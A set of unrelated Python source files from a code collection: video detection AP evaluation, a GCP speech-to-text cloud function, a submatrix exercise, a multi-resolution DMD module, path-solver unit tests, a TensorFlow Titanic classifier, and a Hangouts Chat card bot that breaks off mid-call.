# tmp_dets = v_dets[-1]
del v_dets[-1]
res.append([cls_ind, v_cnt, v_dets])
v_cnt += 1
v_dets = []
# v_dets.append(tmp_dets)
v_dets.append([frame_index, img_cls_dets])
frame_index += 1
# the last video
# print('num of videos:{}'.format(v_cnt))
res.append([cls_ind, v_cnt, v_dets])
return res
gt_videos_format = gt_to_videts(gt_videos)
pred_videos_format = imagebox_to_videts(all_boxes, CLASSES)
ap_all = []
for cls_ind, cls in enumerate(CLASSES[0:]):
cls_ind += 1
# [ video_index, [[frame_index, x1,y1,x2,y2]] ]
gt = [g[1:] for g in gt_videos_format if g[0]==cls_ind]
pred_cls = [p[1:] for p in pred_videos_format if p[0]==cls_ind]
cls_len = None
ap = video_ap_one_class(gt, pred_cls, iou_thresh, bTemporal, cls_len)
ap_all.append(ap)
return ap_all
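if __name__ == '__main__':
    # Minimal usage sketch (illustrative only; it assumes core.utils provides
    # bbox_iou as imported above). The detections below are made-up boxes in
    # <x1> <y1> <x2> <y2> <class score> format, one array per frame.
    demo_detections = [
        np.array([[10., 10., 50., 50., 0.90]], dtype=np.float32),
        np.array([[12., 11., 52., 49., 0.80]], dtype=np.float32),
        np.array([[11., 12., 51., 50., 0.85]], dtype=np.float32),
    ]
    demo_tubes = link_bbxes_between_frames(demo_detections)
    print('linked {} tube(s) across {} frames'.format(len(demo_tubes), len(demo_detections)))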
|
the-stack_106_19139
|
# Copyright 2022 Google LLC All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import datetime,time
import re,json
from google.cloud import storage
from google.cloud.storage.blob import Blob
from google.cloud import speech_v1p1beta1 as speech
gcs_results_stt = os.environ['gcs_results_stt']
def gcp_storage_upload_string(source_string, bucket_name, blob_name):
try:
storage_client = storage.Client()
bucket = storage_client.get_bucket(bucket_name)
blob = bucket.blob(blob_name)
blob.upload_from_string(source_string)
except Exception as e:
print('[ ERROR ] Failed to upload to GCS. {}'.format(e))
def gcp_storage_download_as_string(bucket_name, blob_name):
'''
Downloads a blob from the bucket, and outputs as a string.
'''
try:
storage_client = storage.Client()
bucket = storage_client.get_bucket(bucket_name)
blob = bucket.blob(blob_name)
blob_content = blob.download_as_string()
return blob_content
except Exception as e:
print('[ EXCEPTION ] {}'.format(e))
def gcp_speech_to_text_long(gcs_uri, gcs_object_name):
print(f'[ INFO ] Starting gcp_speech_to_text_long against {gcs_uri}')
start_time = datetime.datetime.now()
speech_client = speech.SpeechClient()
audio = speech.RecognitionAudio(uri=gcs_uri)
config = speech.RecognitionConfig(
#encoding=speech.RecognitionConfig.AudioEncoding.FLAC,
#sample_rate_hertz=16000,
#audio_channel_count=2,
#enable_separate_recognition_per_channel=True,
language_code="en-US",
enable_automatic_punctuation=True,
)
    output_transcription_name = re.sub(r'\.flac$', '.json', gcs_object_name)
output_config = speech.TranscriptOutputConfig(gcs_uri=f"gs://{gcs_results_stt}/{output_transcription_name}")
request = speech.LongRunningRecognizeRequest(config=config, audio=audio, output_config=output_config)
operation = speech_client.long_running_recognize(request=request)
print(f'[ INFO ] Operation: {operation.metadata}')
print(f'[ INFO ] Operation: {operation.result}')
return True
def main(event,context):
# Only process .flac files
    if re.search(r'\.flac$', event['name'].lower().strip()):
gcs_uri = 'gs://{}/{}'.format(event['bucket'], event['name'])
print('[ INFO ] Processing {}'.format(gcs_uri))
text_blob = gcp_speech_to_text_long(gcs_uri, gcs_object_name=event['name'])
return '200'
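if __name__ == '__main__':
    # Local smoke test (illustrative only): simulate the event payload that Cloud
    # Functions delivers for a GCS object-finalize trigger. The bucket and object
    # names are made up, and running this still requires valid GCP credentials
    # plus the gcs_results_stt environment variable read at the top of the file.
    sample_event = {'bucket': 'my-audio-bucket', 'name': 'uploads/sample.flac'}
    main(sample_event, None)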
|
the-stack_106_19140
|
from itertools import chain
def get_squares(matrix):
squares = []
for i in range(len(matrix) - 2):
row = matrix[i]
for j in range(len(row) - 2):
square = [
[matrix[i][j], matrix[i][j + 1], matrix[i][j + 2]],
[matrix[i + 1][j], matrix[i + 1][j + 1], matrix[i + 1][j + 2]],
[matrix[i + 2][j], matrix[i + 2][j + 1], matrix[i + 2][j + 2]]
]
squares.append(square)
return squares
def get_sum_of_matrix(matrix):
return sum(chain(*matrix))
def get_max_square(squares):
max_square = None
max_square_sum = 0
for square in squares:
square_sum = get_sum_of_matrix(square)
if max_square is None or square_sum > max_square_sum:
max_square = square
max_square_sum = square_sum
return max_square
n, m = [int(x) for x in input().split()]
matrix = [[int(x) for x in input().split()] for _ in range(n)]
squares = get_squares(matrix)
max_square = get_max_square(squares)
print(f"Sum = {get_sum_of_matrix(max_square)}")
print('\n'.join([' '.join(map(str, row)) for row in max_square]))
############## Tanya's solution ##############
# rows, cols = [int(x) for x in input().split()]
# matrix = []
# best_sum = -99999999999999
# best_matrix = []
#
# for _ in range(rows):
# line = [int(x) for x in input().split()]
# matrix.append(line)
#
# for row in range(rows - 2):
# for col in range(cols - 2):
# sub_matrix = []
# current_sum = 0
# row_counter = 0
# for r in range(row, row + 3):
# sub_matrix.append([])
# for c in range(col, col + 3):
# sub_matrix[row_counter].append(matrix[r][c])
# current_sum += matrix[r][c]
# row_counter += 1
# if current_sum > best_sum:
# best_sum = current_sum
# best_matrix = sub_matrix
#
# print(f"Sum = {best_sum}")
# for row in best_matrix:
# print(' '.join([str(x) for x in row]))
|
the-stack_106_19141
|
"""
Derived module from dmdbase.py for multi-resolution dmd.
Reference:
- Kutz, J. Nathan, Xing Fu, and Steven L. Brunton. Multiresolution Dynamic Mode
Decomposition. SIAM Journal on Applied Dynamical Systems 15.2 (2016): 713-735.
"""
from __future__ import division
from builtins import range
from past.utils import old_div
import numpy as np
import scipy.linalg
import matplotlib.pyplot as plt
from .dmdbase import DMDBase
class MrDMD(DMDBase):
"""
Multi-resolution Dynamic Mode Decomposition
:param svd_rank: the rank for the truncation; If 0, the method computes the
optimal rank and uses it for truncation; if positive interger, the
method uses the argument for the truncation; if float between 0 and 1,
the rank is the number of the biggest singular values that are needed
to reach the 'energy' specified by `svd_rank`; if -1, the method does
not compute truncation.
:type svd_rank: int or float
:param int tlsq_rank: rank truncation computing Total Least Square. Default
is 0, that means TLSQ is not applied.
:param bool exact: flag to compute either exact DMD or projected DMD.
Default is False.
:param bool opt: flag to compute optimal amplitudes. See :class:`DMDBase`.
Default is False.
:param rescale_mode: Scale Atilde as shown in
10.1016/j.jneumeth.2015.10.010 (section 2.4) before computing its
eigendecomposition. None means no rescaling, 'auto' means automatic
rescaling using singular values, otherwise the scaling factors.
:type rescale_mode: {'auto'} or None or numpy.ndarray
:param int max_cycles: the maximum number of mode oscillations in any given
time scale. Default is 1.
    :param int max_level: the maximum number of levels. Default is 6.
"""
def __init__(self,
svd_rank=0,
tlsq_rank=0,
exact=False,
opt=False,
max_cycles=1,
max_level=6,
rescale_mode=None):
super(MrDMD, self).__init__(svd_rank, tlsq_rank, exact, opt,
rescale_mode)
self.max_cycles = max_cycles
self.max_level = max_level
self._nsamples = None
self._steps = None
def _index_list(self, level, node):
"""
        Private method that returns the index in the internal bin list for a
        given level and node.
:param int level: the level in the binary tree.
:param int node: the node id.
:rtype: int
:return: the index of the list that contains the binary tree.
"""
if level >= self.max_level:
raise ValueError("Invalid level: greater than `max_level`")
if node >= 2**level:
raise ValueError("Invalid node")
return 2**level + node - 1
def _index_list_reversed(self, index):
"""
        Method that returns the level and node given the index of the bin.
:param int index: the index of the bin in the binary tree.
:return: the level of the bin in the binary tree and the node id
in that level.
"""
if index > 2**self.max_level - 2:
raise ValueError("Invalid index: maximum index is ({})".format(2**self.max_level - 2))
for lvl in range(self.max_level + 1):
if index < 2**lvl - 1:
break
level = lvl - 1
node = index - 2**level + 1
return level, node
def partial_time_interval(self, level, node):
"""
Evaluate the start and end time and the period of a given bin.
:param int level: the level in the binary tree.
:param int node: the node id.
:return: the start and end time and the period of the bin
:rtype: dictionary
"""
if level >= self.max_level:
raise ValueError(
'The level input parameter ({}) has to be less than the '
'max_level ({}). Remember that the starting index is 0'.format(
level, self.max_level))
if node >= 2**level:
raise ValueError("Invalid node")
full_period = self.original_time['tend'] - self.original_time['t0']
period = full_period / 2**level
t0 = self.original_time['t0'] + period*node
tend = t0 + period
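        # For example, with original_time t0=0, tend=1 and (level=2, node=1) this
        # yields t0=0.25, tend=0.5 and dt=0.25.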
return {'t0': t0, 'tend':tend, 'dt':period}
def time_window_bins(self, t0, tend):
"""
Find which bins are embedded (partially or totally) in a given
time window.
:param float t0: start time of the window.
:param float tend: end time of the window.
:return: indexes of the bins seen by the time window.
:rtype: numpy.ndarray
"""
indexes = []
for level in range(self.max_level):
for i in range(2**level):
local_times = self.partial_time_interval(level, i)
if t0 >= local_times['t0'] and t0 < local_times['tend']:
indexes.append(self._index_list(level, i))
if tend > local_times['t0'] and tend <= local_times['tend']:
indexes.append(self._index_list(level, i))
if t0 <= local_times['t0'] and tend >= local_times['tend']:
indexes.append(self._index_list(level, i))
# Remove duplicates if they exist
# indexes = list(dict.fromkeys(indexes)) # Python 3.7 or later (preserve order)
indexes = list(set(indexes)) # Any Python version, but does not preserve order
indexes = np.sort(indexes)
return indexes
def time_window_eigs(self, t0, tend):
"""
Get the eigenvalues relative to the modes of the bins embedded (partially
or totally) in a given time window.
:param float t0: start time of the window.
:param float tend: end time of the window.
:return: the eigenvalues for that time window.
:rtype: numpy.ndarray
"""
indexes = self.time_window_bins(t0, tend)
return np.concatenate([self._eigs[idx] for idx in indexes])
def time_window_frequency(self, t0, tend):
"""
Get the frequencies relative to the modes of the bins embedded (partially
or totally) in a given time window.
:param float t0: start time of the window.
:param float tend: end time of the window.
:return: the frequencies for that time window.
:rtype: numpy.ndarray
"""
eigs = self.time_window_eigs(t0, tend)
return np.log(eigs).imag/(2*np.pi*self.original_time['dt'])
def time_window_growth_rate(self, t0, tend):
"""
Get the growth rate values relative to the modes of the bins embedded (partially
or totally) in a given time window.
:param float t0: start time of the window.
:param float tend: end time of the window.
:return: the Floquet values for that time window.
:rtype: numpy.ndarray
"""
return self.time_window_eigs(t0, tend).real/self.original_time['dt']
def time_window_amplitudes(self, t0, tend):
"""
Get the amplitudes relative to the modes of the bins embedded (partially
or totally) in a given time window.
:param float t0: start time of the window.
:param float tend: end time of the window.
:return: the amplitude of the modes for that time window.
:rtype: numpy.ndarray
"""
indexes = self.time_window_bins(t0, tend)
return np.concatenate([self._b[idx] for idx in indexes])
@property
def reconstructed_data(self):
"""
Get the reconstructed data.
:return: the matrix that contains the reconstructed snapshots.
:rtype: numpy.ndarray
"""
try:
data = np.sum(
np.array([
self.partial_reconstructed_data(i)
for i in range(self.max_level)
]),
axis=0)
except MemoryError:
data = np.array(self.partial_reconstructed_data(0))
for i in range(1, self.max_level):
data = np.sum([data,
np.array(self.partial_reconstructed_data(i))], axis=0)
return data
@property
def modes(self):
"""
Get the matrix containing the DMD modes, stored by column.
:return: the matrix containing the DMD modes.
:rtype: numpy.ndarray
"""
return np.hstack(tuple(self._modes))
@property
def dynamics(self):
"""
Get the time evolution of each mode.
:return: the matrix that contains all the time evolution, stored by
row.
:rtype: numpy.ndarray
"""
return np.vstack(
tuple([self.partial_dynamics(i) for i in range(self.max_level)]))
@property
def eigs(self):
"""
Get the eigenvalues of A tilde.
:return: the eigenvalues from the eigendecomposition of `atilde`.
:rtype: numpy.ndarray
"""
return np.concatenate(self._eigs)
def partial_modes(self, level, node=None):
"""
Return the modes at the specific `level` and at the specific `node`; if
`node` is not specified, the method returns all the modes of the given
`level` (all the nodes).
:param int level: the index of the level from where the modes are
extracted.
:param int node: the index of the node from where the modes are
extracted; if None, the modes are extracted from all the nodes of
the given level. Default is None.
"""
if node:
return self._modes[self._index_list(level, node)]
indeces = [self._index_list(level, i) for i in range(2**level)]
return np.hstack(tuple([self._modes[idx] for idx in indeces]))
def partial_dynamics(self, level, node=None):
"""
Return the time evolution of the specific `level` and of the specific
`node`; if `node` is not specified, the method returns the time
evolution of the given `level` (all the nodes).
:param int level: the index of the level from where the time evolution
is extracted.
:param int node: the index of the node from where the time evolution is
extracted; if None, the time evolution is extracted from all the
nodes of the given level. Default is None.
"""
def dynamic(eigs, amplitudes, step, nsamples):
omega = old_div(
np.log(np.power(eigs, old_div(1., step))),
self.original_time['dt'])
partial_timestep = np.arange(nsamples) * self.dmd_time['dt']
vander = np.exp(np.multiply(*np.meshgrid(omega, partial_timestep)))
return (vander * amplitudes).T
if node:
indeces = [self._index_list(level, node)]
else:
indeces = [self._index_list(level, i) for i in range(2**level)]
level_dynamics = [
dynamic(self._eigs[idx], self._b[idx], self._steps[idx],
self._nsamples[idx]) for idx in indeces
]
return scipy.linalg.block_diag(*level_dynamics)
def partial_eigs(self, level, node=None):
"""
Return the eigenvalues of the specific `level` and of the specific
`node`; if `node` is not specified, the method returns the eigenvalues
of the given `level` (all the nodes).
:param int level: the index of the level from where the eigenvalues is
extracted.
:param int node: the index of the node from where the eigenvalues is
extracted; if None, the time evolution is extracted from all the
nodes of the given level. Default is None.
"""
if level >= self.max_level:
raise ValueError(
                'The level input parameter ({}) has to be less than the '
'max_level ({}). Remember that the starting index is 0'.format(
level, self.max_level))
if node:
return self._eigs[self._index_list(level, node)]
indeces = [self._index_list(level, i) for i in range(2**level)]
return np.concatenate([self._eigs[idx] for idx in indeces])
def partial_reconstructed_data(self, level, node=None):
"""
Return the reconstructed data computed using the modes and the time
evolution at the specific `level` and at the specific `node`; if `node`
is not specified, the method returns the reconstructed data
of the given `level` (all the nodes).
:param int level: the index of the level.
:param int node: the index of the node from where the time evolution is
extracted; if None, the time evolution is extracted from all the
nodes of the given level. Default is None.
"""
if level >= self.max_level:
raise ValueError(
'The level input parameter ({}) has to be less than the '
'max_level ({}). Remember that the starting index is 0'.format(
level, self.max_level))
modes = self.partial_modes(level, node)
dynamics = self.partial_dynamics(level, node)
return modes.dot(dynamics)
def fit(self, X):
"""
Compute the Dynamic Modes Decomposition to the input data.
:param X: the input snapshots.
:type X: numpy.ndarray or iterable
"""
self._snapshots, self._snapshots_shape = self._col_major_2darray(X)
# To avoid recursion function, use FIFO list to simulate the tree
# structure
data_queue = [self._snapshots.copy()]
current_bin = 0
# Redefine max level if it is too big.
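        # (roughly: keep at least a handful of snapshots in every bin at the deepest level)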
lvl_threshold = int(np.log(self._snapshots.shape[1]/4.)/np.log(2.)) + 1
if self.max_level > lvl_threshold:
self.max_level = lvl_threshold
print('Too many levels... '
'Redefining `max_level` to {}'.format(self.max_level))
# Reset the lists
self._eigs = []
self._Atilde = []
self._modes = []
self._b = []
self._nsamples = []
self._steps = []
while data_queue:
Xraw = data_queue.pop(0)
n_samples = Xraw.shape[1]
# subsamples frequency to detect slow modes
nyq = 8 * self.max_cycles
step = max(1, int(np.floor(old_div(n_samples, nyq))))
Xsub = Xraw[:, ::step]
Xc = Xsub[:, :-1]
Yc = Xsub[:, 1:]
Xc, Yc = self._compute_tlsq(Xc, Yc, self.tlsq_rank)
U, s, V = self._compute_svd(Xc, self.svd_rank)
Atilde = self._build_lowrank_op(U, s, V, Yc)
eigs, modes = self._eig_from_lowrank_op(Atilde, Yc, U, s, V,
self.exact)
rho = old_div(float(self.max_cycles), n_samples)
slow_modes = (np.abs(
old_div(np.log(eigs), (2. * np.pi * step)))) <= rho
modes = modes[:, slow_modes]
eigs = eigs[slow_modes]
#---------------------------------------------------------------
# DMD Amplitudes and Dynamics
#---------------------------------------------------------------
Vand = np.vander(
np.power(eigs, old_div(1., step)), n_samples, True)
b = self._compute_amplitudes(modes, Xc, eigs, self.opt)
Psi = (Vand.T * b).T
self._modes.append(modes)
self._b.append(b)
self._Atilde.append(Atilde)
self._eigs.append(eigs)
self._nsamples.append(n_samples)
self._steps.append(step)
if Xraw.dtype == 'float64':
Xraw -= modes.dot(Psi).real
else:
Xraw -= modes.dot(Psi)
if current_bin < 2**(self.max_level - 1) - 1:
current_bin += 1
half = int(np.ceil(old_div(Xraw.shape[1], 2)))
data_queue.append(Xraw[:, :half])
data_queue.append(Xraw[:, half:])
else:
current_bin += 1
self.dmd_time = {'t0': 0, 'tend': self._snapshots.shape[1], 'dt': 1}
self.original_time = self.dmd_time.copy()
return self
def plot_eigs(self,
show_axes=True,
show_unit_circle=True,
figsize=(8, 8),
title='',
level=None,
node=None):
"""
Plot the eigenvalues.
:param bool show_axes: if True, the axes will be showed in the plot.
Default is True.
:param bool show_unit_circle: if True, the circle with unitary radius
and center in the origin will be showed. Default is True.
:param tuple(int,int) figsize: tuple in inches of the figure.
:param str title: title of the plot.
:param int level: plot only the eigenvalues of specific level.
:param int node: plot only the eigenvalues of specific node.
"""
if self._eigs is None:
            raise ValueError('The eigenvalues have not been computed. '
'You have to perform the fit method.')
if level:
peigs = self.partial_eigs(level=level, node=node)
else:
peigs = self.eigs
plt.figure(figsize=figsize)
plt.title(title)
plt.gcf()
ax = plt.gca()
if not level:
cmap = plt.get_cmap('viridis')
colors = [cmap(i) for i in np.linspace(0, 1, self.max_level)]
points = []
for lvl in range(self.max_level):
indeces = [self._index_list(lvl, i) for i in range(2**lvl)]
eigs = np.concatenate([self._eigs[idx] for idx in indeces])
points.append(
ax.plot(eigs.real, eigs.imag, '.', color=colors[lvl])[0])
else:
points = []
points.append(
ax.plot(peigs.real, peigs.imag, 'bo', label='Eigenvalues')[0])
# set limits for axis
limit = np.max(np.ceil(np.absolute(peigs)))
ax.set_xlim((-limit, limit))
ax.set_ylim((-limit, limit))
plt.ylabel('Imaginary part')
plt.xlabel('Real part')
if show_unit_circle:
unit_circle = plt.Circle(
(0., 0.), 1., color='green', fill=False, linestyle='--')
ax.add_artist(unit_circle)
# Dashed grid
gridlines = ax.get_xgridlines() + ax.get_ygridlines()
for line in gridlines:
line.set_linestyle('-.')
ax.grid(True)
ax.set_aspect('equal')
# x and y axes
if show_axes:
ax.annotate(
'',
xy=(np.max([limit * 0.8, 1.]), 0.),
xytext=(np.min([-limit * 0.8, -1.]), 0.),
arrowprops=dict(arrowstyle="->"))
ax.annotate(
'',
xy=(0., np.max([limit * 0.8, 1.])),
xytext=(0., np.min([-limit * 0.8, -1.])),
arrowprops=dict(arrowstyle="->"))
# legend
if level:
labels = ['Eigenvalues - level {}'.format(level)]
else:
labels = [
'Eigenvalues - level {}'.format(i)
for i in range(self.max_level)
]
if show_unit_circle:
points += [unit_circle]
labels += ['Unit circle']
ax.add_artist(plt.legend(points, labels, loc='best'))
plt.show()
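if __name__ == '__main__':
    # Minimal usage sketch (illustrative only, not part of the original module):
    # fit the multi-resolution DMD on a small synthetic space-time dataset. The
    # signal below is made up purely for demonstration.
    x = np.linspace(-10, 10, 80)
    t = np.linspace(0, 20, 1600)
    xgrid, tgrid = np.meshgrid(x, t)
    demo_snapshots = (np.exp(-xgrid**2 / 5.) * np.cos(4. * tgrid) +
                      0.5 * np.exp(-(xgrid - 3.)**2) * np.sin(9. * tgrid)).T
    demo_dmd = MrDMD(svd_rank=0, max_level=4, max_cycles=1)
    demo_dmd.fit(demo_snapshots)
    print('reconstruction shape:', demo_dmd.reconstructed_data.shape)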
|
the-stack_106_19143
|
from BlockCirclesPath import BlockCirclesSolver
from BlockCirclesPath import BlockCirclesTracks
import unittest
class BlockCirclesSolverTest(unittest.TestCase):
"""
    Test class for BlockCirclesSolver.
"""
def test_enter_block_circle(self):
"""
        Test code for enter_block_circle()
        Checks:
        1. When a color block is placed on circle 4, the robot enters at circle 6
        2. When the black block is placed on circle 6, the robot enters at circle 6
        3. When neither of the above conditions holds, the robot enters at circle 4
"""
        # Test for check 1
for bonus in range(1, 8 + 1):
for black in range(1, 8 + 1):
if black == 4 or bonus == black:
continue
solver = BlockCirclesSolver(bonus, black, 4, True)
self.assertEqual((2, 0), solver.enter_block_circle())
        # Test for check 2
for bonus in range(1, 8 + 1):
for color in range(1, 8 + 1):
if bonus == 6 or color == 6:
continue
solver = BlockCirclesSolver(bonus, 6, color, True)
self.assertEqual((2, 0), solver.enter_block_circle())
        # Test for check 3
for bonus in range(1, 8 + 1):
for black in range(1, 8 + 1):
for color in range(1, 8 + 1):
                    # constraint imposed by the block bingo rules
if bonus == black or black == color:
                        # constraint to exclude the two exceptional conditions
if color == 4 or black == 6:
continue
solver = BlockCirclesSolver(bonus, black, color, True)
self.assertEqual((1, 0), solver.enter_block_circle())
def test_enter_block_circle_right(self):
"""
        Test code for enter_block_circle(), R (right) course version
        Checks:
        1. When a color block is placed on circle 5, the robot enters at circle 8
        2. When the black block is placed on circle 8, the robot enters at circle 8
        3. When neither of the above conditions holds, the robot enters at circle 5
"""
        # Test for check 1
for bonus in range(1, 8 + 1):
for black in range(1, 8 + 1):
if black == 5 or bonus == black:
continue
solver = BlockCirclesSolver(bonus, black, 5, False)
self.assertEqual((2, 2), solver.enter_block_circle())
        # Test for check 2
for bonus in range(1, 8 + 1):
for color in range(1, 8 + 1):
if bonus == 8 or color == 8:
continue
solver = BlockCirclesSolver(bonus, 8, color, False)
self.assertEqual((2, 2), solver.enter_block_circle())
        # Test for check 3
for bonus in range(1, 8 + 1):
for black in range(1, 8 + 1):
for color in range(1, 8 + 1):
                    # constraint imposed by the block bingo rules
if bonus == black or black == color:
                        # constraint to exclude the two exceptional conditions
if color == 5 or black == 8:
continue
solver = BlockCirclesSolver(bonus, black, color, False)
self.assertEqual((1, 2), solver.enter_block_circle())
def test_path_to_catch_block(self):
"""
        Test code for path_to_catch_block()
        Checks:
        1. The computed path contains no circle on which the color block is placed
        2. The computed path does not include the entry circle
"""
for bonus in range(1, 8 + 1):
for black in range(1, 8 + 1):
for color in range(1, 8 + 1):
                    # constraint imposed by the block bingo rules
if bonus == black or black == color:
continue
solver = BlockCirclesSolver(bonus, black, color, True)
enter = solver.enter_block_circle()
path = solver.path_to_catch_block(enter, BlockCirclesTracks(solver.coordinate))
                    # Test for check 1
self.assertTrue(solver.coordinate.get(color) not in path)
                    # Test for check 2
self.assertTrue(enter not in path)
def test_path_to_bonus_circle(self):
"""
        Test code for path_to_bonus_circle()
        Checks:
        1. The computed path contains no circle on which the black block is placed
        2. Except for its last element, the computed path contains no circle with the color block
"""
for bonus in range(1, 8 + 1):
for black in range(1, 8 + 1):
for color in range(1, 8 + 1):
                    # constraint imposed by the block bingo rules
if bonus == black or black == color:
continue
solver = BlockCirclesSolver(bonus, black, color, True)
path = solver.path_to_bonus_circle(BlockCirclesTracks(solver.coordinate))
                    # Test for check 1
self.assertTrue(solver.coordinate.get(black) not in path)
                    # Test for check 2
self.assertTrue(solver.coordinate.get(color) not in path[0:-1])
def solve(self, is_left):
"""
        Test code for solve()
        Checks:
        1. The first element of the computed path is the coordinate of the entry circle
        2. The last element of the computed path is the coordinate of the bonus circle
        3. Except for its last element, the computed path contains no circle with the color block
"""
for bonus in range(1, 8 + 1):
for black in range(1, 8 + 1):
for color in range(1, 8 + 1):
                    # constraint imposed by the block bingo rules
if bonus == black or black == color:
continue
solver = BlockCirclesSolver(bonus, black, color, is_left)
enter = solver.enter_block_circle()
path = solver.solve()
                    # Test for check 1
self.assertEqual(enter, path[0])
                    # Test for check 2
self.assertEqual(solver.coordinate.get(bonus), path[-1])
                    # Test for check 3
self.assertTrue(solver.coordinate.get(color) not in path[0:-1])
def test_solve_left(self):
self.solve(True)
def test_solve_right(self):
self.solve(False)
def test_subset_of_tracks(self):
"""
        Test code for subset_of_tracks()
        Checks:
        1. Returns None when an element not contained in the list is specified
        2. The subset does not include the start point at its head
        3. The subset includes the end point at its tail
        4. When the start point comes after the end point, the subset equals the original list minus the (end -> start) subset
        5. Except for case 4, the subset preserves the order of the original list
"""
original = [i + 1 for i in range(0, 5)] # [1, 2, 3, 4, 5]
        solver = BlockCirclesSolver(1, 2, 3, True)  # the argument values are arbitrary
        # Test for check 1
self.assertIsNone(solver.subset_of_tracks(0, 3, original))
self.assertIsNone(solver.subset_of_tracks(2, 6, original))
        # Test for check 2
self.assertTrue(1 not in solver.subset_of_tracks(1, 3, original))
        # Test for check 3
self.assertTrue(3 in solver.subset_of_tracks(1, 3, original))
        # Test for check 4
subtrahend = solver.subset_of_tracks(2, 4, original) # [3, 4]
subset = solver.subset_of_tracks(4, 2, original) # [5, 1, 2]
self.assertEqual(set(original) - set(subtrahend), set(subset))
        # Test for check 5
start = original.index(2) + 1
goal = original.index(5) + 1
self.assertEqual(original[start:goal], solver.subset_of_tracks(2, 5, original))
if __name__ == '__main__':
unittest.main()
|
the-stack_106_19144
|
from __future__ import absolute_import, division, print_function, unicode_literals
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import tensorflow as tf
import tensorflow.compat.v2.feature_column as fc
import os
def make_input_fn(data_df, label_df, num_epochs=10, shuffle=True, batch_size=32):
    # epochs (how many passes over the data) / batch (size of each chunk of data) / data (x) / label (y)
    def input_function():  # wrap the dataset construction in a closure the estimator can call later
        ds = tf.data.Dataset.from_tensor_slices((dict(data_df), label_df))  # build the dataset from the given features and labels
        if shuffle:
            ds = ds.shuffle(1000)  # shuffle the data
        ds = ds.batch(batch_size).repeat(num_epochs)  # batch the data and repeat it for the requested number of epochs
return ds
return input_function
x_train = pd.read_csv(r'C:\Users\vinis\Downloads\train.csv')
x_test = pd.read_csv(r'C:\Users\vinis\Downloads\eval.csv')
'''sns.pairplot(x_train)
plt.show()
sns.heatmap(x_train.corr(), cmap='Wistia', annot=True)
plt.show()
only picks up the numeric columns...'''
y_train = x_train.pop('survived')  # pop removes this column from the dataframe and stores it in this variable
y_test = x_test.pop('survived')
pd.concat([x_train, y_train], axis=1).groupby('sex').survived.mean().plot(kind='barh').set_xlabel('% survived')
# plt.show()  # percentage of survivors by sex
# Converting categories into numbers:
feature_list = []
categorical_column = ['sex', 'class', 'deck', 'embark_town', 'alone']
numeric_column = ['age', 'fare', 'n_siblings_spouses', 'parch']
for item in categorical_column:
vocabulary = x_train[item].unique()
feature_list.append(tf.feature_column.categorical_column_with_vocabulary_list(item, vocabulary))
    # build a list with the unique values of each column and add them as categorical features
for item in numeric_column:
    feature_list.append(tf.feature_column.numeric_column(item, dtype=tf.float32))  # add the numeric columns
# Training the model:
train_input_data = make_input_fn(x_train, y_train)
test_input_data = make_input_fn(x_test, y_test, num_epochs=1, shuffle=False)
linear_est = tf.estimator.LinearClassifier(feature_columns=feature_list)
linear_est.train(train_input_data)  # train
result = linear_est.evaluate(test_input_data)  # evaluate
os.system('cls')
print(result)
# To predict: `predict` expects an input function rather than a raw data row; as an
# illustrative stand-in, the evaluation input function defined above is reused here.
result = list(linear_est.predict(test_input_data))
|
the-stack_106_19145
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
from apiclient.discovery import build, build_from_document
from flask import Flask, render_template, request, json, make_response
from httplib2 import Http
from oauth2client.service_account import ServiceAccountCredentials
app = Flask(__name__)
INTERACTIVE_TEXT_BUTTON_ACTION = "doTextButtonAction"
INTERACTIVE_IMAGE_BUTTON_ACTION = "doImageButtonAction"
INTERACTIVE_BUTTON_PARAMETER_KEY = "param_key"
BOT_HEADER = 'Card Bot Python'
@app.route('/', methods=['POST'])
def home_post():
"""Respond to POST requests to this endpoint.
All requests sent to this endpoint from Hangouts Chat are POST
requests.
"""
event_data = request.get_json()
resp = None
# If the bot is removed from the space, it doesn't post a message
# to the space. Instead, log a message showing that the bot was removed.
if event_data['type'] == 'REMOVED_FROM_SPACE':
logging.info('Bot removed from %s' % event_data['space']['name'])
return 'OK'
elif event_data['type'] == 'ADDED_TO_SPACE' and event_data['space']['type'] == 'ROOM':
resp = { 'text': ('Thanks for adding me to {}!'
.format(event_data['space']['name'])) }
elif event_data['type'] == 'ADDED_TO_SPACE' and event_data['space']['type'] == 'DM':
resp = { 'text': ('Thanks for adding me to a DM, {}!'
.format(event_data['user']['displayName'])) }
elif event_data['type'] == 'MESSAGE':
resp = create_card_response(event_data['message']['text'])
elif event_data['type'] == 'CARD_CLICKED':
action_name = event_data['action']['actionMethodName']
parameters = event_data['action']['parameters']
resp = respond_to_interactive_card_click(action_name, parameters)
space_name = event_data['space']['name']
logging.info(resp)
# Uncomment the following line for a synchronous response.
#return json.jsonify(resp)
# Asynchronous response version:
    thread_id = None
    # Not every event type (e.g. ADDED_TO_SPACE) carries a message, so guard the lookup.
    if event_data.get('message', {}).get('thread') is not None:
        thread_id = event_data['message']['thread']
# Need to return a response to avoid an error in the Flask app
send_async_response(resp, space_name, thread_id)
return 'OK'
@app.route('/', methods=['GET'])
def home_get():
"""Respond to GET requests to this endpoint.
This function responds to requests with a simple HTML landing page for this
App Engine instance.
"""
return render_template('home.html')
def send_async_response(response, space_name, thread_id):
"""Sends a response back to the Hangouts Chat room asynchronously.
Args:
response: the response payload
spaceName: The URL of the Hangouts Chat room
"""
# The following two lines of code update the thread that raised the event.
# Delete them if you want to send the message in a new thread.
if thread_id != None:
response['thread'] = thread_id
##################################
scopes = ['https://www.googleapis.com/auth/chat.bot']
credentials = ServiceAccountCredentials.from_json_keyfile_name(
'service-acct.json', scopes)
http_auth = credentials.authorize(Http())
chat = build('chat', 'v1', http=http_auth)
chat.spaces().messages().create(
